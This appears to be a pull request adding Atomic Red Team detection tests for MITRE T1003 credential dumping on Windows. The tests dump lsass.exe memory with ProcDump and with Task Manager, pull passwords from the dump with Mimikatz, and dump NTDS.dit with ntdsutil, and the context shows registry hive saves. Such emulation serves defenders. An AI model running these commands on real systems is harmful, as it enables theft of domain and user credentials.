### PR TITLE
T1003 Added credential dumping tests

### DIFF
--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -93,3 +93,26 @@ atomic_tests:
       3. Dump lsass.exe memory:
         Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
 
+
+- name: Offline Credential Theft With Mimikatz
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. Adversaries commonly perform this offline analysis with 
+    Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
+  supported_platforms:
+    - windows
+  input_arguments:
+    input_file:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: lsass_dump.dmp
+  executor:
+    name: manual
+    steps: |
+      1. Open Mimikatz:
+        Execute `mimikatz` at a command prompt.
+
+      2. Select a Memory Dump:
+        Within the Mimikatz interactive shell, execute `sekurlsa::minidump #{input_file}`
+
+      3. Obtain Credentials:
+        Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`

--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -56,7 +56,6 @@ atomic_tests:
       reg save HKLM\system system
       reg save HKLM\security security
 
-
 - name: Dump LSASS.exe Memory using ProcDump
   description: |
     The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals 
@@ -116,3 +115,20 @@ atomic_tests:
 
       3. Obtain Credentials:
         Within the Mimikatz interactive shell, execute `sekurlsa::logonpasswords full`
+
+- name: Dump Active Directory Database with NTDSUtil
+  description: |
+    The Active Directory database NTDS.dit may be dumped using NTDSUtil for offline credential theft attacks. This capability 
+    uses the "IFM" or "Install From Media" backup functionality that allows Active Directory restoration or installation of 
+    subsequent domain controllers without the need of network-based replication.
+  supported_platforms:
+    - windows
+  input_arguments:
+    output_folder:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: C:\Atomic_Red_Team
+  executor:
+    name: command_prompt
+    command: |
+      ntdsutil “ac i ntds” “ifm” “create full #{output_folder} q q

--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -73,3 +73,23 @@ atomic_tests:
     command: |
       procdump.exe -accepteula -ma lsass.exe #{output_file}
 
+- name: Dump LSASS.exe Memory using Windows Task Manager
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with the Windows Task 
+    Manager and administrative permissions.
+  supported_platforms:
+    - windows
+  executor:
+    name: manual
+    steps: |
+      1. Open Task Manager:
+        On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking 
+        on the task bar and selecting "Task Manager".
+
+      2. Select lsass.exe:
+        If lsass.exe is not visible, select "Show processes from all users". This will allow you to observe execution of lsass.exe 
+        and select it for manipulation.
+
+      3. Dump lsass.exe memory:
+        Right-click on lsass.exe in Task Manager. Select "Create Dump File". The following dialog will show you the path to the saved file.
+

--- a/atomics/T1003/T1003.yaml
+++ b/atomics/T1003/T1003.yaml
@@ -55,3 +55,21 @@ atomic_tests:
       reg save HKLM\sam sam
       reg save HKLM\system system
       reg save HKLM\security security
+
+
+- name: Dump LSASS.exe Memory using ProcDump
+  description: |
+    The memory of lsass.exe is often dumped for offline credential theft attacks. This can be achieved with Sysinternals 
+    ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysinternals/downloads/procdump.
+  supported_platforms:
+    - windows
+  input_arguments:
+    output_file:
+      description: Path where resulting dump should be placed
+      type: Path
+      default: lsass_dump.dmp
+  executor:
+    name: command_prompt
+    command: |
+      procdump.exe -accepteula -ma lsass.exe #{output_file}
+


### PR DESCRIPTION
**Details:**
Added tests to:
- Demonstrate lsass.exe memory dumping via ProcDump and Task Manager
- Demonstrate offline credential theft using Mimikatz and a memory dump
- Demonstrate NTDS.dit dumping via NTDSUtil

**Testing:**
Tested on Windows 7 and Server 2012 R2 (domain controller)

**Associated Issues:**
No associated issues